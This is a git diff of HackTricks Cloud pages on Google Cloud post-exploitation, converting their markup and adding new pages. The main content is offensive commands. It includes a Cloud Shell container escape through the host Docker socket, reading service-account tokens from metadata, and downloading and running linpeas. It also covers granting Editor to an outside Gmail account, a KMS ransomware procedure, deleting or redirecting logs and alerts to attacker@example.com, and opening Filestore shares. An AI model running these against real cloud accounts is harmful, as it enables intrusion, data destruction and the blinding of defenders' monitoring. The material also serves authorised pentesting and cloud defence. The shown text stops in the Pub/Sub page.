diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.md similarity index 52% rename from pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.md rename to src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.md index cd5dbc522..30135adc2 100644 --- a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.md +++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.md @@ -1,56 +1,38 @@ # GCP - Cloud Shell Post Exploitation -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Cloud Shell For more information about Cloud Shell check: -{% content-ref url="../gcp-services/gcp-cloud-shell-enum.md" %} -[gcp-cloud-shell-enum.md](../gcp-services/gcp-cloud-shell-enum.md) -{% endcontent-ref %} +{{#ref}} +../gcp-services/gcp-cloud-shell-enum.md +{{#endref}} ### Container Escape Note that the Google Cloud Shell runs inside a container, you can **easily escape to the host** by doing: -{% code overflow="wrap" %} ```bash sudo docker -H unix:///google/host/var/run/docker.sock pull alpine:latest sudo docker -H unix:///google/host/var/run/docker.sock run -d -it --name escaper -v "/proc:/host/proc" -v "/sys:/host/sys" -v "/:/rootfs" --network=host --privileged=true --cap-add=ALL alpine:latest sudo docker -H unix:///google/host/var/run/docker.sock start escaper sudo docker -H unix:///google/host/var/run/docker.sock exec -it escaper /bin/sh ``` -{% endcode %} This is not considered a vulnerability by google, but it gives you a wider vision of what is happening in that env. Moreover, notice that from the host you can find a service account token: -{% code overflow="wrap" %} ```bash wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/" default/ vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/ ``` -{% endcode %} With the following scopes: -{% code overflow="wrap" %} ```bash wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/scopes" 
@@ -58,19 +40,16 @@ https://www.googleapis.com/auth/devstorage.read_only https://www.googleapis.com/auth/logging.write https://www.googleapis.com/auth/monitoring.write ``` -{% endcode %} Enumerate metadata with LinPEAS: -{% code overflow="wrap" %} ```bash cd /tmp wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh sh linpeas.sh -o cloud ``` -{% endcode %} -After using [https://github.com/carlospolop/bf\_my\_gcp\_permissions](https://github.com/carlospolop/bf_my_gcp_permissions) with the token of the Service Account **no permission was discovered**... +After using [https://github.com/carlospolop/bf_my_gcp_permissions](https://github.com/carlospolop/bf_my_gcp_permissions) with the token of the Service Account **no permission was discovered**... ### Use it as Proxy @@ -120,17 +99,4 @@ cd ngrok;./ngrok tcp 3128 The instructions were copied from [https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key](https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key). Check that page for other crazy ideas to run any kind of software (databases and even windows) in Cloud Shell. -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md similarity index 53% rename from pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md rename to src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md index 1235ac87d..34da94a25 100644 --- a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md +++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md @@ -1,27 +1,14 @@ # GCP - Cloud SQL Post Exploitation -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Cloud SQL For more information about Cloud SQL check: -{% content-ref url="../gcp-services/gcp-cloud-sql-enum.md" %} -[gcp-cloud-sql-enum.md](../gcp-services/gcp-cloud-sql-enum.md) -{% endcontent-ref %} +{{#ref}} +../gcp-services/gcp-cloud-sql-enum.md +{{#endref}} ### `cloudsql.instances.update`, ( `cloudsql.instances.get`) @@ -64,11 +51,9 @@ gcloud sql users create --instance --password --instance --password ``` -{% endcode %} ### `cloudsql.instances.restoreBackup`, `cloudsql.backupRuns.get` @@ -115,17 +100,4 @@ Delete a database from the db instance: gcloud sql databases delete --instance ``` -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.md similarity index 52% rename from pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.md rename to src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.md index 95ba0b1c6..9ef2e128a 100644 --- a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.md +++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.md @@ -1,27 +1,14 @@ # GCP - Compute Post Exploitation -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Compute For more information about Compute and VPC (Networking) check: -{% content-ref url="../gcp-services/gcp-compute-instances-enum/" %} -[gcp-compute-instances-enum](../gcp-services/gcp-compute-instances-enum/) -{% endcontent-ref %} +{{#ref}} +../gcp-services/gcp-compute-instances-enum/ +{{#endref}} ### Export & Inspect Images locally @@ -29,31 +16,28 @@ This would allow an attacker to **access the data contained inside already exist It's possible to export a VM image to a bucket and then download it and mount it locally with the command: -{% code overflow="wrap" %} ```bash gcloud compute images export --destination-uri gs:///image.vmdk --image imagetest --export-format vmdk # The download the export from the bucket and mount it locally ``` -{% endcode %} Fore performing this action the attacker might need privileges over the storage bucket and for sure **privileges over cloudbuild** as it's the **service** which is going to be asked to perform the export\ Moreover, for this to work the codebuild SA and the compute SA needs privileged permissions.\ The cloudbuild SA `@cloudbuild.gserviceaccount.com` needs: -* roles/iam.serviceAccountTokenCreator -* roles/compute.admin -* roles/iam.serviceAccountUser +- roles/iam.serviceAccountTokenCreator +- roles/compute.admin +- roles/iam.serviceAccountUser And the SA `-compute@developer.gserviceaccount.com` needs: -* oles/compute.storageAdmin -* roles/storage.objectAdmin +- oles/compute.storageAdmin +- roles/storage.objectAdmin ### Export & Inspect Snapshots & Disks locally It's not possible to directly export snapshots and disks, but it's possible to **transform a snapshot in a disk, a disk in an image** and following the **previous section**, export that image to inspect it locally -{% code overflow="wrap" %} ```bash # Create a Disk from a snapshot gcloud compute disks create [NEW_DISK_NAME] --source-snapshot=[SNAPSHOT_NAME] --zone=[ZONE] 
@@ -61,7 +45,6 @@ gcloud compute disks create [NEW_DISK_NAME] --source-snapshot=[SNAPSHOT_NAME] -- # Create an image from a disk gcloud compute images create [IMAGE_NAME] --source-disk=[NEW_DISK_NAME] --source-disk-zone=[ZONE] ``` -{% endcode %} ### Inspect an Image creating a VM @@ -116,32 +99,22 @@ Mount the disk inside the VM: ```sh gcloud compute ssh [INSTANCE_NAME] --zone [ZONE] ``` -2. **Identify the Disk**: Once inside the VM, identify the new disk by listing the disk devices. Typically, you can find it as `/dev/sdb`, `/dev/sdc`, etc. -3. **Format and Mount the Disk** (if it's a new or raw disk): - * Create a mount point: - ```sh - sudo mkdir -p /mnt/disks/[MOUNT_DIR] - ``` - * Mount the disk: +2. **Identify the Disk**: Once inside the VM, identify the new disk by listing the disk devices. Typically, you can find it as `/dev/sdb`, `/dev/sdc`, etc. +3. **Format and Mount the Disk** (if it's a new or raw disk): - ```sh - sudo mount -o discard,defaults /dev/[DISK_DEVICE] /mnt/disks/[MOUNT_DIR] - ``` + - Create a mount point: + + ```sh + sudo mkdir -p /mnt/disks/[MOUNT_DIR] + ``` + + - Mount the disk: + + ```sh + sudo mount -o discard,defaults /dev/[DISK_DEVICE] /mnt/disks/[MOUNT_DIR] + ``` If you **cannot give access to a external project** to the snapshot or disk, you might need to p**erform these actions inside an instance in the same project as the snapshot/disk**. -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.md new file mode 100644 index 000000000..7300de2e5 --- /dev/null +++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.md 
@@ -0,0 +1,100 @@ +# GCP - Filestore Post Exploitation + +{{#include ../../../banners/hacktricks-training.md}} + +## Filestore + +For more information about Filestore check: + +{{#ref}} +../gcp-services/gcp-filestore-enum.md +{{#endref}} + +### Mount Filestore + +A shared filesystem **might contain sensitive information** interesting from an attackers perspective. With access to the Filestore it's possible to **mount it**: + +```bash +sudo apt-get update +sudo apt-get install nfs-common +# Check the share name +showmount -e +# Mount the share +mkdir /mnt/fs +sudo mount [FILESTORE_IP]:/[FILE_SHARE_NAME] /mnt/fs +``` + +To find the IP address of a filestore insatnce check the enumeration section of the page: + +{{#ref}} +../gcp-services/gcp-filestore-enum.md +{{#endref}} + +### Remove Restrictions and get extra permissions + +If the attacker isn't in an IP address with access over the share, but you have enough permissions to modify it, it's possible to remover the restrictions or access over it. 
It's also possible to grant more privileges over your IP address to have admin access over the share: + +```bash +gcloud filestore instances update nfstest \ + --zone= \ + --flags-file=nfs.json + +# Contents of nfs.json +{ + "--file-share": + { + "capacity": "1024", + "name": "", + "nfs-export-options": [ + { + "access-mode": "READ_WRITE", + "ip-ranges": [ + "/32" + ], + "squash-mode": "NO_ROOT_SQUASH", + "anon_uid": 1003, + "anon_gid": 1003 + } + ] + } +} +``` + +### Restore a backup + +If there is a backup it's possible to **restore it** in an existing or in a new instance so its **information becomes accessible:** + +```bash +# Create a new filestore if you don't want to modify the old one +gcloud filestore instances create \ + --zone= \ + --tier=STANDARD \ + --file-share=name=vol1,capacity=1TB \ + --network=name=default,reserved-ip-range=10.0.0.0/29 + +# Restore a backups in a new instance +gcloud filestore instances restore \ + --zone= \ + --file-share= \ + --source-backup= \ + --source-backup-region= + +# Follow the previous section commands to mount it +``` + +### Create a backup and restore it + +If you **don't have access over a share and don't want to modify it**, it's possible to **create a backup** of it and **restore** it as previously mentioned: + +```bash +# Create share backup +gcloud filestore backups create \ + --region= \ + --instance= \ + --instance-zone= \ + --file-share= + +# Follow the previous section commands to restore it and mount it +``` + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.md new file mode 100644 index 000000000..eadadc6f6 --- /dev/null +++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.md 
@@ -0,0 +1,29 @@ +# GCP - IAM Post Exploitation + +{{#include ../../../banners/hacktricks-training.md}} + +## IAM + +You can find further information about IAM in: + +{{#ref}} +../gcp-services/gcp-iam-and-org-policies-enum.md +{{#endref}} + +### Granting access to management console + +Access to the [GCP management console](https://console.cloud.google.com) is **provided to user accounts, not service accounts**. To log in to the web interface, you can **grant access to a Google account** that you control. This can be a generic "**@gmail.com**" account, it does **not have to be a member of the target organization**. + +To **grant** the primitive role of **Owner** to a generic "@gmail.com" account, though, you'll need to **use the web console**. `gcloud` will error out if you try to grant it a permission above Editor. + +You can use the following command to **grant a user the primitive role of Editor** to your existing project: + +```bash +gcloud projects add-iam-policy-binding [PROJECT] --member user:[EMAIL] --role roles/editor +``` + +If you succeeded here, try **accessing the web interface** and exploring from there. + +This is the **highest level you can assign using the gcloud tool**. + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.md similarity index 72% rename from pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.md rename to src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.md index fb4c0cdd1..fbfbf734a 100644 --- a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.md +++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.md 
@@ -1,27 +1,14 @@ # GCP - KMS Post Exploitation -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## KMS Find basic information about KMS in: -{% content-ref url="../gcp-services/gcp-kms-enum.md" %} -[gcp-kms-enum.md](../gcp-services/gcp-kms-enum.md) -{% endcontent-ref %} +{{#ref}} +../gcp-services/gcp-kms-enum.md +{{#endref}} ### `cloudkms.cryptoKeyVersions.destroy` @@ -78,18 +65,16 @@ In AWS it's possible to completely **steal a KMS key** by modifying the KMS reso However, there is another way to perform a global KMS Ransomware, which would involve the following steps: -* Create a new **version of the key with a key material** imported by the attacker +- Create a new **version of the key with a key material** imported by the attacker -{% code overflow="wrap" %} ```bash gcloud kms import-jobs create [IMPORT_JOB] --location [LOCATION] --keyring [KEY_RING] --import-method [IMPORT_METHOD] --protection-level [PROTECTION_LEVEL] --target-key [KEY] ``` -{% endcode %} -* Set it as **default version** (for future data being encrypted) -* **Re-encrypt older data** encrypted with the previous version with the new one. -* **Delete the KMS key** -* Now only the attacker, who has the original key material could be able to decrypt the encrypted data +- Set it as **default version** (for future data being encrypted) +- **Re-encrypt older data** encrypted with the previous version with the new one. +- **Delete the KMS key** +- Now only the attacker, who has the original key material could be able to decrypt the encrypted data #### Here are the steps to import a new version and disable/delete the older data: @@ -128,7 +113,7 @@ gcloud kms keys versions import \ --location us-central1 \ --keyring kms-lab-2-keyring \ --key kms-lab-2-key \ - --algorithm "google-symmetric-encryption" \ + --algorithm "google-symmetric-encryption" \ --target-key-file my-key-material.bin # Get versions 
@@ -269,17 +254,4 @@ verified = verify_asymmetric_signature(project_id, location_id, key_ring_id, key print('Verified:', verified) ``` -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.md similarity index 55% rename from pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.md rename to src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.md index 9217a9fad..c63578d82 100644 --- a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.md +++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.md @@ -1,33 +1,20 @@ # GCP - Logging Post Exploitation -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Basic Information For more information check: -{% content-ref url="../gcp-services/gcp-logging-enum.md" %} -[gcp-logging-enum.md](../gcp-services/gcp-logging-enum.md) -{% endcontent-ref %} +{{#ref}} +../gcp-services/gcp-logging-enum.md +{{#endref}} For other ways to disrupt monitoring check: -{% content-ref url="gcp-monitoring-post-exploitation.md" %} -[gcp-monitoring-post-exploitation.md](gcp-monitoring-post-exploitation.md) -{% endcontent-ref %} +{{#ref}} +gcp-monitoring-post-exploitation.md +{{#endref}} ### Default Logging @@ -39,7 +26,6 @@ In [https://console.cloud.google.com/iam-admin/audit/allservices](https://consol ### Read logs - `logging.logEntries.list` -{% code overflow="wrap" %} ```bash # Read logs gcloud logging read "logName=projects/your-project-id/logs/log-id" --limit=10 --format=json @@ -49,35 +35,28 @@ gcloud logging read "timestamp >= \"2023-01-01T00:00:00Z\"" --limit=10 --format= # Use these options to indicate a different bucket or view to use: --bucket=_Required --view=_Default ``` -{% endcode %} ### `logging.logs.delete` -{% code overflow="wrap" %} ```bash # Delete all entries from a log in the _Default log bucket - logging.logs.delete gcloud logging logs delete ``` -{% endcode %} ### Write logs - `logging.logEntries.create` -{% code overflow="wrap" %} ```bash # Write a log entry to try to disrupt some system gcloud logging write LOG_NAME "A deceptive log entry" --severity=ERROR ``` -{% endcode %} ### `logging.buckets.update` -{% code overflow="wrap" %} ```bash # Set retention period to 1 day (_Required has a fixed one of 400days) gcloud logging buckets update bucketlog --location= --description="New description" --retention-days=1 ``` -{% endcode %} ### `logging.buckets.delete` 
@@ -88,12 +67,10 @@ gcloud logging buckets delete BUCKET_NAME --location= ### `logging.links.delete` -{% code overflow="wrap" %} ```bash # Delete link gcloud logging links delete --bucket --location ``` -{% endcode %} ### `logging.views.delete` @@ -104,21 +81,17 @@ gcloud logging views delete --bucket= --location=global ### `logging.views.update` -{% code overflow="wrap" %} ```bash # Update a logging view to hide data gcloud logging views update --log-filter="resource.type=gce_instance" --bucket= --location=global --description="New description for the log view" ``` -{% endcode %} ### `logging.logMetrics.update` -{% code overflow="wrap" %} ```bash # Update log based metrics - logging.logMetrics.update gcloud logging metrics update --description="Changed metric description" --log-filter="severity>CRITICAL" --project=PROJECT_ID ``` -{% endcode %} ### `logging.logMetrics.delete` @@ -136,7 +109,6 @@ gcloud logging sinks delete ### `logging.sinks.update` -{% code overflow="wrap" %} ```bash # Disable sink - logging.sinks.update gcloud logging sinks update --disabled @@ -145,7 +117,7 @@ gcloud logging sinks update --disabled gcloud logging sinks update SINK_NAME --add-exclusion="name=exclude-info-logs,filter=severity new-destination +gcloud logging sinks update new-destination # Change the service account to one withuot permissions to write in the destination - logging.sinks.update gcloud logging sinks update SINK_NAME --custom-writer-identity=attacker-service-account-email --project=PROJECT_ID 
@@ -157,19 +129,5 @@ gcloud logging sinks update SINK_NAME --clear-exclusions gcloud logging sinks update SINK_NAME --use-partitioned-tables gcloud logging sinks update SINK_NAME --no-use-partitioned-tables ``` -{% endcode %} -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.md new file mode 100644 index 000000000..d8efaccd1 --- /dev/null +++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.md 
@@ -0,0 +1,114 @@ +# GCP - Monitoring Post Exploitation + +{{#include ../../../banners/hacktricks-training.md}} + +## Monitoring + +Fore more information check: + +{{#ref}} +../gcp-services/gcp-monitoring-enum.md +{{#endref}} + +For other ways to disrupt logs check: + +{{#ref}} +gcp-logging-post-exploitation.md +{{#endref}} + +### `monitoring.alertPolicies.delete` + +Delete an alert policy: + +```bash +gcloud alpha monitoring policies delete +``` + +### `monitoring.alertPolicies.update` + +Disrupt an alert policy: + +```bash +# Disable policy +gcloud alpha monitoring policies update --no-enabled + +# Remove all notification channels +gcloud alpha monitoring policies update --clear-notification-channels + +# Chnage notification channels +gcloud alpha monitoring policies update --set-notification-channels=ATTACKER_CONTROLLED_CHANNEL + +# Modify alert conditions +gcloud alpha monitoring policies update --policy="{ 'displayName': 'New Policy Name', 'conditions': [ ... ], 'combiner': 'AND', ... 
}" +# or use --policy-from-file +``` + +### `monitoring.dashboards.update` + +Modify a dashboard to disrupt it: + +```bash +# Disrupt dashboard +gcloud monitoring dashboards update --config=''' + displayName: New Dashboard with New Display Name + etag: 40d1040034db4e5a9dee931ec1b12c0d + gridLayout: + widgets: + - text: + content: Hello World + ''' +``` + +### `monitoring.dashboards.delete` + +Delete a dashboard: + +```bash +# Delete dashboard +gcloud monitoring dashboards delete +``` + +### `monitoring.snoozes.create` + +Prevent policies from generating alerts by creating a snoozer: + +```bash +# Stop alerts by creating a snoozer +gcloud monitoring snoozes create --display-name="Maintenance Week" \ + --criteria-policies="projects/my-project/alertPolicies/12345,projects/my-project/alertPolicies/23451" \ + --start-time="2023-03-01T03:00:00.0-0500" \ + --end-time="2023-03-07T23:59:59.5-0500" +``` + +### `monitoring.snoozes.update` + +Update the timing of a snoozer to prevent alerts from being created when the attacker is interested: + +```bash +# Modify the timing of a snooze +gcloud monitoring snoozes update --start-time=START_TIME --end-time=END_TIME + +# odify everything, including affected policies +gcloud monitoring snoozes update --snooze-from-file= +``` + +### `monitoring.notificationChannels.delete` + +Delete a configured channel: + +```bash +# Delete channel +gcloud alpha monitoring channels delete +``` + +### `monitoring.notificationChannels.update` + +Update labels of a channel to disrupt it: + +```bash +# Delete or update labels, for example email channels have the email indicated here +gcloud alpha monitoring channels update CHANNEL_ID --clear-channel-labels +gcloud alpha monitoring channels update CHANNEL_ID --update-channel-labels=email_address=attacker@example.com +``` + +{{#include ../../../banners/hacktricks-training.md}} 
diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.md similarity index 56% rename from pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.md rename to src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.md index ea3325a93..62f11337f 100644 --- a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.md +++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.md @@ -1,27 +1,14 @@ # GCP - Pub/Sub Post Exploitation -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
